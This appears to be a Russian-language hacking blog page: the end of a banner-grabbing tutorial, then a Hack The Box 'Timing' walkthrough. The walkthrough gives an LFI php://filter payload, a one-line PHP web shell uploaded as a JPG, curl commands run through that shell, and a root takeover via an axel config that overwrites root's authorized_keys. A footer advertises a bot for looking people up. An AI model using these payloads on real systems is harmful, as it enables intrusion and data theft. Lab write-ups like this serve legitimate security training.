• 200 — код состояния HTTP.

Способ 2: Выполните команду

1nc <hostname/ip_адрес>

Теперь введите HEAD HTTP/ /1.0 и нажмите Enter.

• HEAD — это глагол HTTP, HTTP/ обозначает корень страницы.
• /1.0 — версия HTTP.

Telnet

В консоли Kali, выполните команду:

1telnet <имя_хоста/ip_адрес>

Появится ​​подсказка.

Введите HEAD HTTP//1.0 и нажмите Enter.

Nikto

Введите следующую команду и нажмите Enter:

1nikto -h

Вы увидите баннер в качестве вывода. Нажмите Ctrl+C, чтобы остановить.

Nmap

Последний инструмент сбора баннеров на Kali Linux это популярный сканер Nmap.

Подойдите к терминалу и введите

1nmap -sV -A <имя_хоста/ip_адрес> -p 80

Параметр:

• -sV используется для определения версии службы.
• -A для агрессивного сканирования.
• -p для определения порта.

Заключение

Мы рассмотрели популярные способы сбора баннеров на Кали. Конечно, существует множество других инструментов и методов для захвата баннеров, но это самые простые, которые сможете быстро освоить и использовать.

РЕКОМЕНДУЕМ:

• Скрытое сканирование хостов с Nmap
• Использование сканера портов RustScan на Kali Linux

Источник

Наши проекты:

- Кибер новости: the Matrix
- Хакинг: /me Hacker
- Кодинг: Minor Code
👁 Пробить человека? Легко через нашего бота: Мистер Пробиватор

В этой статье рассмотрим прохождение уязвимой машины Timing Hack The Box, в рамках которой будем взламывать веб-сервер на PHP. Для получения флага мы будем сканировать порты, экс­плу­атировать уяз­вимос­ти LFI и заг­рузим шел­л.

Еще по теме: Как взломать сайт WordPress

Лучше подключаться к машине HTB с помощью VPN. И желательно не делать это со своего личного компа, на котором хранится чувствительная информация.Взлом веб-сервера на PHP

Для начала до­бав­им IP-адрес машины в/etc/hosts:

110.10.11.135 timing.htb

Начнем со сканирования портов. Это стан­дар­тная операция при любом пентесте. Сканирование портов позволит определить, какие служ­бы на машине при­нима­ют соеди­нение.

Для этого отлично подходит популярный сканер Nmap. Следующий скрипт улучшит резуль­таты сканирования:

123#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. Пер­вый про­изво­дит­ просто быс­трое ска­ниро­вание, вто­рой — глубокое ска­ниро­вание, используя име­ющиеся скрип­ты (опция —A)

Сканер нашел два откры­тых пор­та:

• 80 — веб‑сер­вер Apache 2.4.29;
• 22 — служ­ба OpenSSH 7.6p1.

На SSH нам ловить нечего, про­пус­каем его.

Брутфорс учеток

У нас пока нет учет­ных дан­ных, поэтому нет смыс­ла в анализе служ­б, которые как правило тре­буют авто­риза­ции (нап­ример, SSH). Единс­твен­ное, что можно сделать на данном этапе — перебрать пароли брут­ом, но уязвимые машины с Hack The Boxt практически всегда имеют другие решения. В реальности таких вари­антов может не быть, но можно всегда использовать социальную инженерию.

При попытке обра­щения к веб‑сер­веру про­исхо­дит редирект на стра­ницу/login.php и форму авто­риза­ции.

Исходя из этого можно предположить, что это не однос­тра­нич­ный сайт, поэто­му будем пробовать отыскать скры­тые стра­ницы. Пер­вая стра­ница была в PHP, логично осталь­ные переби­рать тоже с расширением PHP. Я предпочитаю использовать для этой цели ска­нер ffuf.

Сканирование веба c ffuf

Пер­вое дей­ствие при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов. Для это­й цели вы можете исполь­зовать прог­раммы вро­де DIRB и dirsearch.

Мне нравится лег­кий и очень быс­трый ffuf. Параметры запуска:

• -w — сло­варь (лично я предпочитаю сло­вари из SecLists);
• -fc — исклю­чить из резуль­тата отве­ты с кодом 403;
• -u — URL;
• -t — количес­тво потоков.

За­пус­каем ffuf с парамет­рами:

1ffuf -u http://timing.htb/FUZZ -t 256 -w php_files_common.txt

Сканер нашел мно­жество фай­лов, теперь попробуем найти скры­тые катало­ги.

1ffuf -u http://timing.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt

Сканер находит катало­ги использующиеся для хра­нения скрип­тов и изоб­ражений. И это все. Ска­ниро­вание поддоменов и фай­лов резервных копий нечего не дало.

Попробуем поискать парамет­ры. Для ска­ниро­вания разумеется выбираем стра­ницу image.php, которая по идее дол­жна воз­вра­щать изоб­ражения. Так как мы пока не зна­ем, что именно будет переда­но в качес­тве зна­чения парамет­ра, попытается передать само наз­вание стра­ницы, надеясь получить какую-то ошиб­ку.

1ffuf -u 'http://timing.htb/image.php?FUZZ=../image.php' -t 256 -w parameters.txt -fs 0

Мы наш­ли один параметр —img. И теперь можно зап­росить файл с кар­тинкой по его наз­ванию. Попытаемся таким образом снять какой‑нибудь сис­темный файл, задав отно­ситель­ный путь.

Попытка не удалась. Нас атаку обнаружили!

Видимо в данном конкретном случае исполь­зуют­ся какие‑то филь­тры, которые не позволяют нам читать файлы. Я поп­робовал раз­ные вари­анты обер­ток для парамет­ра и понял, что сра­баты­вает вот такой зап­рос:

12/image.php?img=php://filter/convert.base64-encode/resource=index.phpСправка: LFI в PHP

Local file inclusion (LFI) — тех­ника, которую исполь­зуют­ для получе­ния дос­тупа к фай­лам в сис­теме через веб‑сер­вер. Что­бы веб-сер­вер отоб­разил файл, вместо попытки выполнения, ему следует передать «обер­тку» — это коман­ды, которые закоди­руют файл. Пос­ле его получе­ния нужно лишь рас­кодиро­вать его обратно. Есть мно­жес­тво различных го­товых обер­ток, которые вы можете использовать в пен­тесте.

Со­дер­жимое получен­ной в ответ стра­ницы, будет закоди­рова­но в Base64. Мож­но декоди­ровать пря­мо в Burp, нажав сочетание клавиш Ctrl-Shift-B.

Таким образом мы можем получить код всех страниц, просмотрим все страницы и среди них оисходный код стра­ницы login.php.

Наше внимание привлекает строка 10 — под­клю­чения фай­ла db_conn.php. Там нашлась учет­ная запись для под­клю­чения к БД. Отроем и его.

Па­роль ни к чему не подходит, поэто­му продолжаем копать.

Переходим к известным фай­лам. Нач­инаем с upload.php.

В начале под­клю­чает­ся файл admin_auth_check.php. После зада­ются нужные парамет­ры для заг­ружен­ного фай­ла, в том чис­ле иfile_name. Создание имени файла происходит по такому алго­рит­му: берет­ся стро­ка'$file_hash', после добав­ляет­ся текущее вре­мя (резуль­тат выпол­нения фун­кцииtime()) и все это кон­верти­рует­ся в хеш MD5, а затем добав­ляет­ся знак ниж­него под­черки­вания и имя фай­ла исполь­зуемое при заг­рузке. Файл дол­жен иметь рас­ширение jpg. А в фай­ле admin_auth_check.php толь­ко срав­нива­ется роль поль­зовате­ля.

Ес­ли бы$file_hash кто‑то по ошиб­ке не обер­нул в кавыч­ки, то было бы подставлено зна­чение перемен­ной, получен­ное от PHP-фун­кцииuniqid(). Раз­гадать уни­каль­ный иден­тифика­тор у нас бы не получилось, а без него единс­твен­ной прег­радой будет вывод фун­кцииtime().

Итак, здесь пока боль­ше ничего не де­лать, и требуется бру­т фор­мы авто­риза­ции. В начале най­дем име­на поль­зовате­лей, к при­меру в фай­ле /etc/passwd.

Но при под­боре пароля сра­зу поп­робу­ем исполь­зовать имя поль­зовате­ля в качес­тве пароля, и это дает нам дос­туп.

Нам откры­вает­ся новая фун­кция — изме­нение про­филя.

Форма изменения профиляФор­ма изме­нения про­филя

При отправ­ке дан­ных фор­мы прос­мотрим, куда они шлют­ся, а потом получим код этой стра­ницы, что­бы прос­мотреть, как обра­баты­вают­ся дан­ные.

Ви­дим, что в обра­бот­чике на один параметр боль­ше, чем отправ­ляет­ся через фор­му. Зна­чит, мы можем добавитьrole и задать любую роль. Это дол­жно дать нам при­виле­гиро­ван­ный кон­текст.

В ито­ге мы получа­ем ответ со все­ми перечис­ленны­ми парамет­рами, а на самой стра­нице появ­ляет­ся ссыл­ка на панель адми­нис­тра­тора.

С панели адми­нис­тра­тора нам откры­вает­ся фун­кция заг­рузки ава­тара.

Мы зна­ем, что это дол­жен быть файл с рас­ширени­ем jpg. Но вот толь­ко его содер­жимое не про­веря­ется, поэто­му мы можем записать туда код на PHP и затем поп­робовать выпол­нить. Запишем сле­дующий прос­той PHP-шелл, выпол­няющий при­нятую коман­ду, и заг­рузим файл на сер­вер.

1echo '<!--?php echo system($_GET["cmd"]);?-->' > test.jpg

Файл успешно заг­ружен, теперь опре­делим­ся с име­нем, под которым он сох­ранил­ся на сер­вере. Для это­го вспом­ним прин­цип, по которо­му он фор­миру­ется.

Единс­твен­ная перемен­ная, которую нам оста­лось получить, — зна­чение фун­кции time(). Эта фун­кция воз­вра­щает количес­тво секунд, про­шед­ших с 00:00:00 01.01.1970. И если мы зна­ем вре­мя заг­рузки фай­ла, уста­нов­ленное на сер­вере, мы смо­жем получить это зна­чение. Так как вся работа выпол­няет­ся через Burp, в исто­рии зап­росов най­дем HTTP-заголо­вок отве­та сер­вера. В заголов­ке Date будет ука­зано нуж­ное нам вре­мя.

Те­перь мы можем получить зна­чение MD5 от сло­жения всех строк:

1echo md5('$file_hash' . strtotime("Wed, 05 Jan 2022 13:19:51 GMT"));

Нам нуж­но обра­щать­ся к фай­лу вот с таким име­нем:

1e3879d6c6425db4ad6e139681d11693d_test.jpg

Поп­робу­ем с помощью нашего хеша выпол­нить базовую коман­ду id.

1curl 'http://timing.htb/image.php?img=images/uploads/e3879d6c6425db4ad6e139681d11693d_test.jpg&cmd=id'

Ко­ман­да успешно выпол­нена, что озна­чает получе­ние дос­тупа к хос­ту.

Продвижение

Для даль­нейше­го прод­вижения нам необ­ходимо най­ти учет­ные дан­ные. Для это­го пред­сто­ит изу­чить фай­лы в катало­ге веб‑сер­вера, все­воз­можные резер­вные копии и дру­гие поль­зователь­ские фай­лы. Так находим бэкапы исходни­ков в катало­ге /opt.

Ко­пиру­ем архив в каталог веб‑сер­вера и лег­ко ска­чива­ем через бра­узер.

1curl 'http://timing.htb/image.php?img=images/uploads/e3879d6c6425db4ad6e139681d11693d_test.jpg&cmd=cp+/opt/source-files-backup.zip+./'

В архи­ве при­сутс­тву­ет каталог с рас­ширени­ем git. Это поз­волит нам получить дос­туп к исто­рии изме­нений фай­лов.

Для удоб­ной работы с репози­тори­ями Git мож­но исполь­зовать гра­фичес­кий прос­мот­рщик gitk. Он помог най­ти изме­нение пароля для под­клю­чения к базе дан­ных.

А вот уже с этим паролем уда­ется под­клю­чить­ся по SSH и заб­рать пер­вый флаг.

Локальное повышение привилегий

Пер­вым делом про­веря­ем наибо­лее веро­ятные мес­та повыше­ния при­виле­гий: нас­трой­ки sudoers, при­ложе­ния с выс­тавлен­ным битом SUID, прос­лушива­емые на локал­хосте пор­ты. Про­верим sudoers коман­дой sudo -l.

В нас­трой­ках про­писан при­виле­гиро­ван­ный запуск /usr/bin/netutils без вво­да пароля (NOPASSWD). Прос­мотрим тип фай­ла.

Это обыч­ный скрипт. Давай гля­нем на его содер­жимое.

Это поль­зователь­ское при­ложе­ние на Java. Но так как оно рас­положе­но в катало­ге рута, мы не можем получить дос­туп к самому фай­лу и деком­пилиро­вать его, что­бы изу­чить. Тог­да давай хотя бы запус­тим прог­рамму и пос­мотрим, как она работа­ет.

Нам пред­лага­ют выб­рать одну из опций: FTP или HTTP. Пос­ле чего с ука­зан­ного ресур­са заг­ружа­ется файл.

Пос­мотрим, что про­исхо­дит с про­цес­сами в сис­теме при выпол­нении это­го при­ложе­ния. Для отсле­жива­ния про­цес­сов будем исполь­зовать pspy64. Заг­рузим его на хост:

1scp ./pspy64 aaron@timing.htb:/tmp/

И выпол­ним. В выводе видим запуск скрип­та, но, что более инте­рес­но, пос­ле ука­зания адре­са для заг­рузки исполь­зует­ся прог­рамма axel в кон­тек­сте поль­зовате­ля с UID=0, а это поль­зователь root.

Я сра­зу поп­робовал выпол­нить инъ­екцию коман­ды ОС, но это ничего не дало.

Од­нако мы можем кон­фигури­ровать axel и управлять некото­рыми его парамет­рами, к при­меру име­нем фай­ла и катало­гом для его сох­ранения. Недол­го раз­мышляя, про­буем сох­ранить файл как пуб­личный SSH-ключ поль­зовате­ля root. Для это­го в домаш­нем катало­ге текуще­го поль­зовате­ля сох­раним файл .axelrc со сле­дующим содер­жимым:

1default_filename = /root/.ssh/authorized_keys

На локаль­ном хос­те сге­нери­руем пару клю­чей (ssh-keygen) и пере­име­нуем пуб­личный, что­бы он называл­ся index.html. Запус­тим прос­той веб‑сер­вер на Python:

1python3 -m http.server 80

А затем обра­тим­ся к нему из тес­тиру­емо­го при­ложе­ния.

Ви­дим сооб­щение с име­нем сох­ранен­ного фай­ла, про­буем под­клю­чить­ся с зак­рытым клю­чом и получа­ем кон­троль над хос­том.

Ма­шина зах­вачена, и у нас есть флаг рута.

Заключение

Се­год­ня мы с вами прошли путь от обычного ска­ниро­вания сай­та до экс­плу­ата­ции уяз­вимос­ти типа LFI и заг­рузки шел­ла. Надеюсь вам понравился наше увлекательное приключение Timing с пло­щад­ки Hack The Box.

Полезные ссылки:

• Взлом сайта на Django
• Взлом nginx с помощью уяз­вимости в скрип­те
• Взлом веб-сервера на Windows и Apache через SSRF

Источник

Наши проекты:

- Кибер новости: the Matrix
- Хакинг: /me Hacker
- Кодинг: Minor Code